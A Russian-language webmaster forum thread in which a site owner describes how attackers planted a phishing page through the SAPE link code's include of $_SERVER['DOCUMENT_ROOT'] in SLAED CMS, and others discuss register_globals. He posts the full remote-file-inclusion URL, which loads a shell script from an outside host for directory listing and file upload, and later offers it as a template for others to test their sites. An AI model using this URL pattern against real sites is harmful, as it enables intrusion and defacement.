14.11.2008, 09:16 | #1 |
Новичок
Регистрация: 14.11.2008
Сообщений: 5
Вес репутации: 0
|
Код SAPE,проблема безопасности возможность заливки шелла
Здравствуйте. Умельцы залили мне на сайт фишинг страницу с помощью вот это ссылки http://www.ххххххххх.net//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/home/хххххх/www/site1/public_html/admin&sort=0a
При нажатии на эту ссылку открывался листинг моих каталогов, с возможностью залить любой файл. Проблема решилась отключением блока с сылками SAPE. Не знаю , как на других CMS, поддвержена этому SLAED CMS: 2.6 Lite. Суппорты обоих сторон молчат. Мож кто знает, как решить эту проблему. А то не охота терять доходы с сылок.Отключил ссылки на 5 сайтах из-за этого. |
14.11.2008, 13:01 | #2 | |
Велес
Регистрация: 01.07.2007
Адрес: Россия
Сообщений: 1,422
Вес репутации: 269
|
Цитата:
Подробнее, плиз...
__________________
|
|
14.11.2008, 15:56 | #3 |
Новичок
Регистрация: 14.11.2008
Сообщений: 5
Вес репутации: 0
|
В CMS в index.php стоит код
Код:
if (!defined('_SAPE_USER')){ define('_SAPE_USER', '***'); } require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); $sape_context = new SAPE_context(); |
14.11.2008, 16:28 | #4 | |
Вредина
Регистрация: 03.07.2007
Адрес: д.Коноплянка
Сообщений: 3,535
Вес репутации: 437
|
Цитата:
__________________
|
|
14.11.2008, 22:42 | #5 |
Новичок
Регистрация: 09.10.2008
Сообщений: 52
Вес репутации: 0
|
Ага, а конкретнее - register_globals: http://ru2.php.net/manual/ru/security.globals.php
|
14.11.2008, 22:53 | #6 |
Новичок
Регистрация: 14.11.2008
Сообщений: 5
Вес репутации: 0
|
Дирректива на хосте
Register globals: Off Ради интереса попробуйте свой сайт перейдите по ссылке Код:
http://www.Ваш сайт.ru//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mazcotaz.com/extra/Format.txt?&act=ls&d=/путь/к вашей дире/www/site1/public_html/admin&sort=0a Последний раз редактировалось Abend; 14.11.2008 в 23:02. |
14.11.2008, 23:19 | #7 | |
Новичок
Регистрация: 09.10.2008
Сообщений: 52
Вес репутации: 0
|
Вы не доверяете документации? Цитата с оф.сайта:
Цитата:
Кстати, может это движок ваш меняет на on? В любом случае, всем не помешает проверить свои сайты на безопасность. |
|
15.11.2008, 01:09 | #9 |
Новичок
Регистрация: 09.10.2008
Сообщений: 52
Вес репутации: 0
|
|
15.11.2008, 01:20 | #10 |
Добрый модератор
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1030
|
Не поможет
__________________
Правильный хостинг. В личке бесплатно не отвечаю обычно. |
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Скоро зима (техника безопасности) | RadoM | Курилка | 1 | 29.10.2008 09:29 |
Брешь в безопасности | kuraga | Ошибки при работе с системой | 0 | 02.10.2008 16:03 |
Проблема с sape | legent | Вопросы от новичков | 8 | 12.06.2008 12:51 |
Проблема с установкой Sape в DLE | Aesha | Ошибки при работе с системой | 4 | 12.09.2007 13:10 |
Проблема с роботом SAPE | bs1 | Вопросы по работе системы | 2 | 28.07.2007 13:30 |
Часовой пояс GMT +3, время: 11:10.